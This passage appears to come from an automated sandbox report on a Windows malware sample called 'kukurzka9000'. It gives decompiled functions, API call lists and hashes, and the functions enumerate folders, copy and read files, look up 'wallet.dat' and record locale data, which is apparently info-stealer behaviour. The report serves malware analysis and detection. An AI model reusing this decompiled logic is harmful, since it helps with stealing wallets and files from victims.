LocalFree.KERNEL32(00000000), ref: 0040B48A
LocalFree.KERNEL32(?), ref: 0040B494
LocalFree.KERNEL32(00000000), ref: 0040B49B
LocalFree.KERNEL32(?), ref: 0040B4A4
LocalFree.KERNEL32(00000000), ref: 0040B4AB
DeleteFileW.KERNEL32(?), ref: 0040B4B2
LocalFree.KERNEL32(?), ref: 0040B4D9
FindClose.KERNEL32(00000000), ref: 0040B4E0

Part of subcall function 0040A70E: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A741
Part of subcall function 0040A70E: LocalFree.KERNEL32(?), ref: 0040A7C2

Part of subcall function 0040B177: LocalFree.KERNEL32(00000000), ref: 0040B25D

Strings

., xrefs: 0040B1EC

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$File$CloseDelete$AllocFindHandleSize
String ID: .
API String ID: 3415656112-248832578
Opcode ID: ef89599a16f3060e6f46494271e3fa6c667b3084db2f4bc1dda9137fff215fc9
Instruction ID: d7038f412777c1620d74c121b4857271da971a97c01f51cff95b18f8f793f09e
Opcode Fuzzy Hash: ef89599a16f3060e6f46494271e3fa6c667b3084db2f4bc1dda9137fff215fc9
Instruction Fuzzy Hash: A5A1B171204301AFD704DF62DD88E6B77A9EF88704F004D29FA55A72A1DB74ED10CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE06 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 300COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 0040AE4E
LocalFree.KERNEL32(00000000), ref: 0040AEA9
LocalFree.KERNEL32(00000000), ref: 0040AEB0

Strings

wallet.dat, xrefs: 0040AF43

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$FolderPathSpecial
String ID: wallet.dat
API String ID: 1941890384-126057665
Opcode ID: cc52245ba0c1cf8e38b16e73aee8d7de3582cbf4d55e3452c4d46f73041d1e99
Instruction ID: c428bda3d7e2fbc090b10557d15fab42b18105d23257a4f21a5ceef78d5d1267
Opcode Fuzzy Hash: cc52245ba0c1cf8e38b16e73aee8d7de3582cbf4d55e3452c4d46f73041d1e99
Instruction Fuzzy Hash: 4BA1B471A00215AFDB14DBA6DD89FAF77B5EB48310F004429F615BB2D0DBB89D10CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403C8F Relevance: 24.3, APIs: 16, Instructions: 255
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00403C8F(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a12) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				char _v596;
				signed int _v640;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t66;
				void* _t70;
				signed int _t77;
				signed int _t86;
				signed int _t91;
				void* _t93;
				void* _t94;
				void* _t96;
				void* _t97;
				signed int _t101;
				signed int _t103;
				void* _t105;
				void* _t107;
				void* _t109;
				void* _t111;
				signed int _t123;
				void* _t124;
				void* _t125;
				void* _t127;
				signed int _t160;
				intOrPtr _t173;
				void* _t181;
				void* _t186;
				signed int _t189;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;

				_v36 = __edx;
				_v28 = __ecx;
				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e1a8);
				while(1) {
					_t124 = _t60;
					if(_t124 == 0) {
						break;
					}
					_t125 = _t124 + 8;
					_t62 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e1f0);
					_t3 = _t62 + 2; // 0x2
					_t63 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
					_v24 = _t63;
					_t66 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t64);
					_v12 = _t66;
					_t70 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t68);
					_v16 = _t70;
					_t186 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t71);
					_v20 = _t186;
					_v32 = _v24 - _t125 >> 1;
					_t77 = E0040A3E4(_t125,  &_v12, _t3 - _t125 >> 1, _v24 - _t125 >> 1);
					__eflags = _t77;
					if(_t77 == 0) {
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_t186);
						L16:
						L17:
						return 1;
					}
					_t181 =  *((intOrPtr*)( *0x40e18c))(_v24 + 2,  *0x40e1e8);
					_t189 = _t181 - _t125 >> 1;
					_t86 = E0040A3E4(_t125,  &_v16, _v32 + 1, _t189);
					__eflags = _t86;
					if(_t86 == 0) {
						L14:
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						goto L16;
					}
					_t17 = _t181 + 2; // 0x2
					_v48 =  *((intOrPtr*)( *0x40e18c))(_t17,  *0x40e228);
					_t20 = _t189 + 1; // 0x1
					_t91 = E0040A3E4(_t125,  &_v20, _t20, _t90 - _t125 >> 1);
					__eflags = _t91;
					if(_t91 == 0) {
						goto L14;
					}
					_t93 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
					_t94 =  *((intOrPtr*)( *0x40e000))(_t93, _a12, _v20);
					_v24 = _t94;
					_t96 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _t94);
					_t173 =  *0x40e1d0; // 0x825f60
					_t97 = E0040A503(_t96, _t173);
					_v44 = _t97;
					_t127 =  *((intOrPtr*)( *0x40e018))(_t97,  &_v640);
					_v40 = _t127;
					__eflags = _t127 - 0xffffffff;
					if(_t127 == 0xffffffff) {
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						__eflags = _v640 & 0x00000010;
						if((_v640 & 0x00000010) != 0) {
							__eflags = _v596 - 0x2e;
							if(_v596 != 0x2e) {
								_t103 =  *((intOrPtr*)( *0x40e18c))( &_v596, _v12);
								__eflags = _t103;
								if(_t103 != 0) {
									_t105 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_t191 =  *((intOrPtr*)( *0x40e13c))(_t105, _a12);
									_v32 = _t191;
									_t107 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
									_t35 = _t107 + 2; // 0x2
									_t160 = _t35 - _t191;
									__eflags = _t160;
									 *((short*)(_t191 + (_t160 >> 1) * 2 - 0x16)) = 0;
									_t109 =  *((intOrPtr*)( *0x40e0e0))(_t191, 0, 0x5c);
									_t39 = _t109 + 2; // 0x2
									 *((intOrPtr*)( *0x40e044))(0x40, 0x208);
									_t192 = _v24;
									_t111 = E0040A503(0, _t192);
									_t193 =  *((intOrPtr*)( *0x40e000))(_t111, _t192,  &_v596);
									E004039D7(_t193, _v16, __eflags, _t39, _t35, _v36, _a4);
									_t194 = _t194 + 0x10;
									LocalFree(_t193);
									LocalFree(_v32);
									_t127 = _v40;
								}
							}
						}
						_t101 =  *((intOrPtr*)( *0x40e148))(_t127,  &_v640);
						__eflags = _t101;
					} while (_t101 != 0);
					FindClose(_t127);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					LocalFree(_v44);
					_t123 = _v48 + 2;
					__eflags = _t123;
					_t60 =  *((intOrPtr*)( *0x40e18c))(_t123,  *0x40e1a8);
				}
				goto L17;
			}

0x00403ca6
0x00403caa
0x00403cad
0x00403f55
0x00403f55
0x00403f59
0x00000000
0x00000000
0x00403cbf
0x00403cc3
0x00403cd1
0x00403cd5
0x00403ce6
0x00403cf0
0x00403cfb
0x00403d0a
0x00403d1b
0x00403d27
0x00403d3b
0x00403d3e
0x00403d41
0x00403d48
0x00403d4a
0x00403f7f
0x00403f88
0x00403f8f
0x00403f8f
0x00403f95
0x00000000
0x00403f97
0x00403d6b
0x00403d71
0x00403d78
0x00403d7f
0x00403d81
0x00403f65
0x00403f68
0x00403f71
0x00403f8f
0x00000000
0x00403f8f
0x00403d93
0x00403d9b
0x00403da6
0x00403dac
0x00403db3
0x00403db5
0x00000000
0x00000000
0x00403dc8
0x00403dd7
0x00403de4
0x00403ded
0x00403df2
0x00403dfa
0x00403e0d
0x00403e12
0x00403e14
0x00403e17
0x00403e1a
0x00000000
0x00000000
0x00000000
0x00000000
0x00403e20
0x00403e20
0x00403e20
0x00403e27
0x00403e2d
0x00403e35
0x00403e4a
0x00403e4c
0x00403e4e
0x00403e60
0x00403e74
0x00403e7b
0x00403e7e
0x00403e82
0x00403e89
0x00403e89
0x00403e8f
0x00403e9a
0x00403ea9
0x00403eac
0x00403eae
0x00403eb5
0x00403ed1
0x00403eda
0x00403edf
0x00403ee3
0x00403eec
0x00403ef2
0x00403ef2
0x00403e4e
0x00403e35
0x00403f02
0x00403f04
0x00403f04
0x00403f0d
0x00403f16
0x00403f1f
0x00403f28
0x00403f31
0x00403f3a
0x00403f4f
0x00403f4f
0x00403f53
0x00403f53
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 00403CF0
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D0A
LocalAlloc.KERNEL32(00000040,00000000), ref: 00403D25

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 8a6da0735ee3c45563ce6ef7da6886ff2a780dc9bc9fef783d63b4fc9ada9af1
Instruction ID: 30a2a756aa81b8726d571d7f3e9c3124e2b02b732ad4ca54e9afcb5ed5404845
Opcode Fuzzy Hash: 8a6da0735ee3c45563ce6ef7da6886ff2a780dc9bc9fef783d63b4fc9ada9af1
Instruction Fuzzy Hash: CC91B571A00215AFDF089FA5DD49DAE7BB9EB48310F004839F905B73A0DB746D21CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004039D7 Relevance: 22.7, APIs: 15, Instructions: 223
fileCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E004039D7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* _v56;
				char _v608;
				signed char _v652;
				void* _t47;
				void* _t50;
				void* _t57;
				void* _t60;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t74;
				void* _t76;
				void* _t78;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t84;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr _t129;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				intOrPtr _t139;
				void* _t143;
				DWORD* _t144;
				void* _t145;
				void* _t149;

				_t101 = __ecx;
				_v24 = __edx;
				_v40 = __ecx;
				_t47 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), __ecx);
				_t129 =  *0x40e1d0; // 0x825f60
				_t143 = E0040A503(_t47, _t129);
				_v20 = _t143;
				_t50 =  *((intOrPtr*)( *0x40e018))(_t143,  &_v652);
				_v16 = _t50;
				if(_t50 != 0xffffffff) {
					_t144 = 0;
					do {
						if((_v652 & 0x00000010) != 0) {
							goto L11;
						} else {
							_push(L"..");
							_push( &_v608);
							if( *((intOrPtr*)( *0x40e0a0))() == 0) {
								goto L11;
							} else {
								_t57 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t149 =  *((intOrPtr*)( *0x40e000))(_t57, _t101,  &_v608);
								_v36 = _t149;
								_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t60 = E0040A69E( *0x40e044,  &_v8);
								_t102 = _v8;
								if(_t60 == 0) {
									L16:
									LocalFree(_t102);
									LocalFree(_t149);
									DeleteFileW(_t102);
								} else {
									_push(_t144);
									_push(_t102);
									_push(_t149);
									if( *((intOrPtr*)( *0x40e184))() == 0) {
										goto L16;
									} else {
										_t68 =  *((intOrPtr*)( *0x40e03c))(_t102, 0x80000000, 1, _t144, 4, _t144, _t144);
										_v32 = _t68;
										GetFileSize(_t68, _t144);
										_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
										_t71 =  *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8);
										_t132 =  *0x40e1b4; // 0x7fe498
										_t72 = E0040A503(_t71, _t132);
										_t133 =  *0x40e1b8; // 0x825c20
										_t74 = E0040A503(E0040A503(_t72, _t133), _v24);
										_t135 =  *0x40e1ec; // 0x825e00
										_t76 = E0040A503(E0040A503(_t74, _t135), _a4);
										_t137 =  *0x40e1ec; // 0x825e00
										_t78 = E0040A503(E0040A503(_t76, _t137), _a8);
										_t139 =  *0x40e1b8; // 0x825c20
										_t80 = E0040A503(E0040A503(_t78, _t139),  &_v608);
										_v12 = _t80;
										_t81 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, _t144, _t80, 0xffffffff, _t144, _t144, _t144, _t144);
										_v28 = _t81;
										_t22 = _t81 + 0x40; // 0x40
										_t145 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
										_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
										_t84 = _v28;
										if(_t84 == 0) {
											LocalFree(_t145);
											LocalFree(_v8);
											goto L10;
										} else {
											_push(0);
											_push(0);
											_push(_t84);
											_push(_t145);
											_push(0xffffffff);
											_push(_v12);
											_push(0);
											_push(0xfde9);
											if( *((intOrPtr*)( *0x40e0e4))() == 0) {
												LocalFree(_v12);
												LocalFree(_t145);
												LocalFree(_t102);
												LocalFree(_t149);
												LocalFree(_v8);
												break;
											} else {
												_v52 = _v32;
												_v56 = _t145;
												_t98 =  *((intOrPtr*)( *0x40e13c))(_v8, _t102);
												_t126 = _a16;
												_v44 = _v44 & 0x00000000;
												_v48 = _t98;
												 *_t126 =  *_a16 + 1;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t149 = _v36;
												L10:
												LocalFree(_t102);
												LocalFree(_t149);
												_t101 = _v40;
												_t144 = 0;
												goto L11;
											}
										}
									}
								}
							}
						}
						L13:
						LocalFree(_v20);
						goto L14;
						L11:
						_push( &_v652);
						_push(_v16);
					} while ( *((intOrPtr*)( *0x40e148))() != 0);
					FindClose(_v16);
					goto L13;
				}
				L14:
				return 0;
			}

APIs

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

GetFileSize.KERNEL32(00000000,00000000), ref: 00403ACE
LocalFree.KERNEL32(00000000), ref: 00403BFB
LocalFree.KERNEL32(?), ref: 00403C04
LocalFree.KERNEL32(?), ref: 00403C0B
LocalFree.KERNEL32(00000000), ref: 00403C12
FindClose.KERNEL32(00000002), ref: 00403C39
LocalFree.KERNEL32(00000002), ref: 00403C42
LocalFree.KERNEL32(?), ref: 00403C52
LocalFree.KERNEL32(00000000), ref: 00403C59
LocalFree.KERNEL32(?), ref: 00403C60
LocalFree.KERNEL32(00000000), ref: 00403C67
LocalFree.KERNEL32(?), ref: 00403C70
LocalFree.KERNEL32(?), ref: 00403C79
LocalFree.KERNEL32(00000000), ref: 00403C80
DeleteFileW.KERNEL32(?), ref: 00403C87

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Local$Filelstrlen$CloseDeleteFindGlobalSize
String ID:
API String ID: 1958670688-0
Opcode ID: 4caac0c3561e47fa950a7463700a638e5ac742770fbd87cb7ad0bc69e4988ff5
Instruction ID: a054592f1a26ae81db5b8b4afeeb8fb0c3e9f03fa1f4561a45be05a4ad2e9d15
Opcode Fuzzy Hash: 4caac0c3561e47fa950a7463700a638e5ac742770fbd87cb7ad0bc69e4988ff5
Instruction Fuzzy Hash: 64718571A00214AFDB04DFB2DD49EAE77B9EB84310F104939F515B7290DB749D11CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004052DA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 232
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E004052DA(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v576;
				char _v584;
				char _v616;
				signed char _v620;
				intOrPtr _v628;
				void* _v632;
				void* _v648;
				intOrPtr _v672;
				char _v676;
				intOrPtr _v696;
				void* _v704;
				intOrPtr _v708;
				void* _v712;
				void* _v720;
				void* _v724;
				void* _v728;
				char _v744;
				intOrPtr _v756;
				intOrPtr _v768;
				void* _v776;
				intOrPtr _v784;
				signed int _v792;
				void* _v796;
				void* _v800;
				void* _v804;
				intOrPtr _v808;
				void* _v812;
				void* _v828;
				void* _v836;
				void* __ebx;
				void* __esi;
				void* _t62;
				void* _t68;
				char _t69;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int _t74;
				void* _t76;
				void* _t86;
				void* _t112;
				void* _t113;
				void* _t114;
				intOrPtr _t151;
				void* _t153;
				void* _t154;
				void* _t159;
				void* _t161;
				void* _t163;
				void* _t164;
				signed int _t166;
				void* _t168;

				_t168 = (_t166 & 0xfffffff8) - 0x284;
				_v628 = __edx;
				_t62 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a, _t153, _t159, _t112);
				_t113 =  *((intOrPtr*)( *0x40e13c))(_t62, __ecx);
				_v632 = _t113;
				E0040188C(_t113, _t113, 0x104, __ecx,  *0x40e1d0);
				_t154 =  *((intOrPtr*)( *0x40e018))(_t113,  &_v616);
				_v648 = _t154;
				if(_t154 != 0xffffffff) {
					_t114 = __ecx;
					do {
						if((_v620 & 0x00000010) == 0) {
							_t68 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t69 =  *((intOrPtr*)( *0x40e000))(_t68, _t114,  &_v584);
							_v676 = _t69;
							_t70 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
							_t72 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t70,  *0x40e1b8), _a4);
							_v708 = _t72;
							_t73 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
							_v708 = _t73;
							_t74 =  *((intOrPtr*)( *0x40e08c))(0);
							_t161 = _v704;
							if(E0040A2AA(_t161 + _t74 * 2,  &_v712, _v696) != 0) {
								_t76 = E0040A503(_v720, _v712);
								_v720 = _t76;
								_v724 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
								if(E0040A69E( *0x40e044,  &_v724) != 0) {
									_t164 = _v724;
									_push(0);
									_push(_t164);
									_push(_v712);
									if( *((intOrPtr*)( *0x40e184))() != 0) {
										_v756 =  *((intOrPtr*)( *0x40e03c))(_t164, 0x80000000, 1, 0, 4, 0, 0);
										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v768, 0xffffffff, 0, 0, 0, 0);
										_v776 = 0;
										 *((intOrPtr*)( *0x40e044))(0x40, 0x30c);
										_t151 = _v784;
										_v804 = 0;
										if(_t151 != 0) {
											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v808, 0xffffffff, 0, _t151, 0, 0);
											if(0 == 0 || E0040A70E( &_v744, _a8) == 0) {
												LocalFree(_v836);
												CloseHandle(_v828);
												DeleteFileW(_t164);
												LocalFree(_t164);
											} else {
												_t139 = _a20;
												_v792 = _v792 & 0x00000000;
												_v804 = _v836;
												_v800 = _v828;
												_v796 = _t164;
												 *_t139 =  *_a20 + 1;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t154 = _v812;
											}
										}
									}
								}
								LocalFree(_v712);
							} else {
								LocalFree(_t161);
							}
							LocalFree(_v728);
							LocalFree(_v720);
							L18:
							goto L19;
						}
						if(_v576 != 0x2e && E0040A70E( &_v576, _a12) == 0) {
							_t86 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
							_t163 =  *((intOrPtr*)( *0x40e000))(_t86, _t114,  &_v584);
							E004052DA(_t163, _v672, _a4, _a8, _a12, _a16, _a20);
							_t168 = _t168 + 0x14;
							LocalFree(_t163);
							goto L18;
						}
						L19:
						_push( &_v676);
						_push(_t154);
					} while ( *((intOrPtr*)( *0x40e148))() != 0);
					LocalFree(_v704);
					FindClose(_t154);
					goto L21;
				} else {
					LocalFree(_t113);
					L21:
					return 0;
				}
			}

0x004052e0
0x004052f5
0x004052fb
0x0040530d
0x00405316
0x0040531a
0x0040532d
0x0040532f
0x00405336
0x00405344
0x00405346
0x0040534b
0x004053bb
0x004053ca
0x004053d9
0x004053dd
0x004053f3
0x00405405
0x00405409
0x00405417
0x0040541b
0x0040541d
0x00405430
0x00405440
0x00405452
0x0040545c
0x00405467
0x0040546d
0x00405476
0x00405478
0x00405479
0x00405481
0x004054a3
0x004054b9
0x004054c8
0x004054cc
0x004054ce
0x004054d2
0x004054d8
0x004054f7
0x004054fb
0x00405549
0x00405554
0x0040555b
0x00405562
0x0040550d
0x0040550d
0x00405514
0x00405519
0x00405521
0x00405530
0x00405538
0x0040553a
0x0040553b
0x0040553c
0x0040553d
0x0040553e
0x0040553e
0x004054fb
0x004054d8
0x00405481
0x0040556c
0x00405432
0x0040556c
0x0040556c
0x00405576
0x00405580
0x00405580
0x00000000
0x00405580
0x00405353
0x00405379
0x00405391
0x004053a1
0x004053a6
0x00405580
0x00000000
0x00405580
0x00405586
0x0040558f
0x00405590
0x00405593
0x004055a0
0x004055a7
0x00000000
0x00405338
0x00405339
0x004055ad
0x004055b5
0x004055b5

APIs

LocalFree.KERNEL32(00000000), ref: 00405339
LocalFree.KERNEL32(?), ref: 00405580
LocalFree.KERNEL32(?), ref: 004055A0
FindClose.KERNEL32(00000000), ref: 004055A7

Strings

., xrefs: 0040534D

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$CloseFind
String ID: .
API String ID: 3269183270-248832578
Opcode ID: 85117cb3117e62e14ba48f75263d130d3e59801c8bcbb9a650a8682f5d93ebc2
Instruction ID: 9add6ecd6c2ae3d530fb5184dfeb79ca83270308c151c7c4913ae962937730f4
Opcode Fuzzy Hash: 85117cb3117e62e14ba48f75263d130d3e59801c8bcbb9a650a8682f5d93ebc2
Instruction Fuzzy Hash: 9C816CB1604301AFDB04DF61DD45E2B77A5EB88714F004D2DFA55A72E0DBB4E910CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401B05 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401BA9
LocalFree.KERNEL32(00000000), ref: 00401C0D
FindClose.KERNEL32(00000000), ref: 00401C7A

Strings

8{@, xrefs: 00401C53, 00401BF5

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CloseCombineFindFreeLocalPath
String ID: 8{@
API String ID: 2857355001-1865321623
Opcode ID: feaf2723ab089db3c6e73f9a78e146223a76f71caf34b501c7023f33917ed91e
Instruction ID: e4eb25170f48de3e52739dcc6529c8d0564bd3351774df583b1370a22c53c5e7
Opcode Fuzzy Hash: feaf2723ab089db3c6e73f9a78e146223a76f71caf34b501c7023f33917ed91e
Instruction Fuzzy Hash: 6741E871900214ABDB149B61DEC8FAA7778EB85300F004579F905B72A0EB79DE55CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00409064 Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00409064(void* __eflags, intOrPtr* _a4) {
				void* _t13;
				void* _t17;
				intOrPtr* _t19;

				_t13 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t17 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				GetLocaleInfoW(GetUserDefaultLCID(), 0x1001, _t13, 0x104);
				wsprintfW(_t17,  *0x40e47c, _t13);
				_t19 = _a4;
				 *_t19 = E0040A503( *_t19, _t17);
				LocalFree(_t13);
				LocalFree(_t17);
				return 1;
			}

0x0040907e
0x0040908f
0x004090a3
0x004090ad
0x004090b3
0x004090c3
0x004090c5
0x004090cc
0x004090d9

APIs

GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,00409A50,00000000), ref: 0040909C
GetLocaleInfoW.KERNEL32(00000000,?,00409A50,00000000,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090A3
wsprintfW.USER32 ref: 004090AD

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090C5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407B1E), ref: 004090CC

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Free$Locallstrlen$DefaultGlobalInfoLocaleUserwsprintf
String ID:
API String ID: 2247720945-0
Opcode ID: 62d0f9841ec6e868d0d1d7cb96462110b985b39fb2cc8cbfcb7090088de899c8
Instruction ID: 624d8c4e8efa692e5b23cff9d3e49fd3310a2e312a93838384a0c37449368444
Opcode Fuzzy Hash: 62d0f9841ec6e868d0d1d7cb96462110b985b39fb2cc8cbfcb7090088de899c8
Instruction Fuzzy Hash: 84F0C8B1200214BFF3005BA6AD89E6777ACEB48724F004435F748B7290CAB46C20866D

Uniqueness

Uniqueness Score: -1.00%

Function 00406468 Relevance: 6.1, APIs: 4, Instructions: 137encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(0040687A,00000000), ref: 004064AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?), ref: 0040655B
LocalFree.KERNEL32(00000000), ref: 00406575
LocalFree.KERNEL32(?), ref: 004065CA

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$BinaryByteCharCryptMultiStringWide
String ID:
API String ID: 565018292-0
Opcode ID: f99eeab593d43d46b53e483af27d95279f1ed3bfb06a039265a8d3998aacac8f
Instruction ID: ac64a0b193ce7f41f530b5697522d6c2b33bbf0bf2498a0822923da046ee8569
Opcode Fuzzy Hash: f99eeab593d43d46b53e483af27d95279f1ed3bfb06a039265a8d3998aacac8f
Instruction Fuzzy Hash: 93417A71A00215AFEB14CBA6DD81FBEBBF8EF88710F104429F605F7290D774A9118B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040196E Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401A10
LocalFree.KERNEL32(00000000), ref: 00401A30
FindClose.KERNEL32(00000000), ref: 00401A4E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401AA4

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

